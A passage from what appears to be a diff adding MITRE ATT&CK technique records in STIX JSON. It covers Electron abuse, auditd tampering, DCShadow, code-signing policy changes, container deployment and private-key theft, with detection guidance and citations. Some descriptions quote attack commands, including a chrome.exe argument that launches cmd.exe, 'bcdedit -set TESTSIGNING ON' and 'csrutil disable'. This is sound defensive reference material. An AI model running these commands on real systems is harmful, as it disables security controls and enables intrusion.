"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-18T22:45:19.607Z", + "name": "Search Open Technical Databases", + "description": "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)\n\nAdversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", + "created": "2020-10-02T16:56:05.810Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1596", + "external_id": "T1596" + }, + { + "source_name": "Circl Passive DNS", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.", + "url": "https://www.circl.lu/services/passive-dns/" + }, + { + "source_name": "DNS Dumpster", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", + "url": "https://dnsdumpster.com/" + }, + { + "source_name": "Medium SSL Cert", + "description": "Jain, M. (2019, September 16). Export & Download — SSL Certificate from Server (Site URL). Retrieved October 20, 2020.", + "url": "https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2" + }, + { + "source_name": "WHOIS", + "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.", + "url": "https://www.whois.net/" + }, + { + "source_name": "Shodan", + "description": "Shodan. (n.d.). Shodan. Retrieved October 20, 2020.", + "url": "https://shodan.io" + }, + { + "source_name": "SSLShopper Lookup", + "description": "SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020.", + "url": "https://www.sslshopper.com/ssl-checker.html" + }, + { + "source_name": "DigitalShadows CDN", + "description": "Swisscom & Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020.", + "url": "https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-15T23:00:33.493Z", + "name": "Electron Applications", + "description": "Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to display web content and Node.js runs the backend code.(Citation: Electron 1)\n\nDue to the functional mechanics of Electron (such as allowing apps to run arbitrary commands), adversaries may also be able to perform malicious functions in the background potentially disguised as legitimate tools within the framework.(Citation: Electron 1) For example, the abuse of `teams.exe` and `chrome.exe` may allow adversaries to execute malicious commands as child processes of the legitimate application (e.g., `chrome.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\system32\\cmd.exe /c calc.exe`).(Citation: Electron 6-8)\n\nAdversaries may also execute malicious content by planting malicious [JavaScript](https://attack.mitre.org/techniques/T1059/007) within Electron applications.(Citation: Electron Security)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Debabrata Sharma" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows", + "Linux" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", + "created": "2024-03-07T19:32:35.383Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/015", + "external_id": "T1218.015" + }, + { + "source_name": "Electron 3", + "description": "Alanna Titterington. (2023, September 14). Security of Electron-based desktop applications. Retrieved March 7, 2024.", + "url": "https://www.kaspersky.com/blog/electron-framework-security-issues/49035/" + }, + { + "source_name": "Electron Security", + "description": "ElectronJS.org. (n.d.). Retrieved March 7, 2024.", + "url": "https://www.electronjs.org/docs/latest/tutorial/using-native-node-modules" + }, + { + "source_name": "Electron 6-8", + "description": "Kosayev, U. (2023, June 15). One Electron to Rule Them All. Retrieved March 7, 2024.", + "url": "https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf" + }, + { + "source_name": "Electron 1", + "description": "TOM ABAI. (2023, August 10). There’s a New Stealer Variant in Town, and It’s Using Electron to Stay Fully Undetected. Retrieved March 7, 2024.", + "url": "https://www.mend.io/blog/theres-a-new-stealer-variant-in-town-and-its-using-electron-to-stay-fully-undetected/" + }, + { + "source_name": "Electron 2", + "description": "Trend Micro. (2023, June 6). Abusing Electronbased applications in targeted attacks. Retrieved March 7, 2024.", + "url": "https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLP-CLEAR-Horejsi-Abusing-Electron-Based-Applications-in-Targeted-Attacks.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-03T03:44:46.935Z", + "name": "Disable or Modify Linux Audit System", + "description": "Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.\n\nOften referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`, containing a sequence of `auditctl` commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)\n\nWith root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tim (Wadhwa-)Brown" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054", + "created": "2023-05-24T19:03:03.855Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1562/012", + "external_id": "T1562.012" + }, + { + "source_name": "IzyKnows auditd threat detection 2022", + "description": "IzySec. (2022, January 26). Linux auditd for Threat Detection. Retrieved September 29, 2023.", + "url": "https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505" + }, + { + "source_name": "Red Hat System Auditing", + "description": "Jahoda, M. et al.. (2017, March 14). Red Hat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.", + "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing" + }, + { + "source_name": "ESET Ebury Feb 2014", + "description": "M.Léveillé, M.. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved April 19, 2019.", + "url": "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/" + }, + { + "source_name": "Trustwave Honeypot SkidMap 2023", + "description": "Radoslaw Zdonczyk. (2023, July 30). Honeypot Recon: New Variant of SkidMap Targeting Redis. Retrieved September 29, 2023.", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Rogue Domain Controller", + "description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Vincent Le Toux" + ], + "x_mitre_detection": "Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an adversary or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)\n\nLeverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)\n\nBaseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)\n\nInvestigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Log analysis" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1207", + "external_id": "T1207" + }, + { + "source_name": "DCShadow Blog", + "description": "Delpy, B. & LE TOUX, V. (n.d.). DCShadow. Retrieved March 20, 2018.", + "url": "https://www.dcshadow.com/" + }, + { + "source_name": "Adsecurity Mimikatz Guide", + "description": "Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz & Command Reference. Retrieved December 23, 2015.", + "url": "https://adsecurity.org/?page_id=1821" + }, + { + "source_name": "GitHub DCSYNCMonitor", + "description": "Spencer S. (2018, February 22). DCSYNCMonitor. Retrieved March 30, 2018.", + "url": "https://github.com/shellster/DCSYNCMonitor" + }, + { + "source_name": "Microsoft DirSync", + "description": "Microsoft. (n.d.). Polling for Changes Using the DirSync Control. Retrieved March 30, 2018.", + "url": "https://msdn.microsoft.com/en-us/library/ms677626.aspx" + }, + { + "source_name": "ADDSecurity DCShadow Feb 2018", + "description": "Lucand,G. (2018, February 18). Detect DCShadow, impossible?. Retrieved March 30, 2018.", + "url": "https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "Code Signing Policy Modification", + "description": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. \n\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\n\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)\n\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Abel Morales, Exabeam" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as bcdedit.exe -set TESTSIGNING ON.(Citation: Microsoft TESTSIGNING Feb 2021) Consider monitoring for modifications made to Registry keys associated with code signing policies, such as HKCU\\Software\\Policies\\Microsoft\\Windows NT\\Driver Signing. Modifications to the code signing policy of a system are likely to be rare.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "User Mode Signature Validation", + "Digital Certificate Validation", + "Application Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c", + "created": "2021-04-23T01:04:57.161Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1553/006", + "external_id": "T1553.006" + }, + { + "source_name": "Apple Disable SIP", + "description": "Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021.", + "url": "https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection" + }, + { + "source_name": "F-Secure BlackEnergy 2014", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" + }, + { + "source_name": "FireEye HIKIT Rootkit Part 2", + "description": "Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html" + }, + { + "source_name": "Microsoft Unsigned Driver Apr 2017", + "description": "Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test" + }, + { + "source_name": "Microsoft DSE June 2017", + "description": "Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021.", + "url": "https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN" + }, + { + "source_name": "Microsoft TESTSIGNING Feb 2021", + "description": "Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option" + }, + { + "source_name": "Unit42 AcidBox June 2020", + "description": "Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.", + "url": "https://unit42.paloaltonetworks.com/acidbox-rare-malware/" + }, + { + "source_name": "GitHub Turla Driver Loader", + "description": "TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021.", + "url": "https://github.com/hfiref0x/TDL" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:05.576Z", + "name": "Denial of View", + "description": "Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nAn adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment's data and processes may still be operational, but functioning in an unintended or adversarial manner. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0815", + "external_id": "T0815" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-11T21:24:42.680Z", + "name": "Deploy Container", + "description": "Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)\n\nContainers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Pawan Kinger, @kingerpawan, Trend Micro", + "Alfredo Oliveira, Trend Micro", + "Idan Frimark, Cisco", + "Center for Threat-Informed Defense (CTID)", + "Magno Logan, @magnologan, Trend Micro", + "Ariel Shuper, Cisco", + "Vishwas Manral, McAfee", + "Yossi Weizman, Azure Defender Research Team", + "Joas Antonio dos Santos, @C0d3Cr4zy" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for suspicious or unknown container images and pods in your environment. Deploy logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application pods to detect malicious activity at the cluster level. In Docker, the daemon log provides insight into remote API calls, including those that deploy containers. Logs for management services or applications used to deploy containers other than the native technologies themselves should also be monitored.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92", + "created": "2021-03-29T16:51:26.020Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1610", + "external_id": "T1610" + }, + { + "source_name": "AppSecco Kubernetes Namespace Breakout 2020", + "description": "Abhisek Datta. (2020, March 18). Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1. Retrieved January 16, 2024.", + "url": "https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216" + }, + { + "source_name": "Aqua Build Images on Hosts", + "description": "Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.", + "url": "https://blog.aquasec.com/malicious-container-image-docker-container-host" + }, + { + "source_name": "Docker Containers API", + "description": "Docker. (n.d.). Docker Engine API v1.41 Reference - Container. Retrieved March 29, 2021.", + "url": "https://docs.docker.com/engine/api/v1.41/#tag/Container" + }, + { + "source_name": "Kubernetes Workload Management", + "description": "Kubernetes. (n.d.). Workload Management. Retrieved March 28, 2024.", + "url": "https://kubernetes.io/docs/concepts/workloads/controllers/" + }, + { + "source_name": "Kubeflow Pipelines", + "description": "The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines. Retrieved March 29, 2021.", + "url": "https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/" + }, + { + "source_name": "Kubernetes Dashboard", + "description": "The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). Retrieved March 29, 2021.", + "url": "https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "File Deletion", + "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Walker Johnson" + ], + "x_mitre_detection": "It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host forensic analysis" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "created": "2017-05-31T21:31:17.915Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1107", + "external_id": "T1107" + }, + { + "source_name": "Trend Micro APT Attack Tools", + "description": "Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Private Keys", + "description": "Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto)\n\nAdversaries may gather private keys from compromised systems for use in authenticating to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. 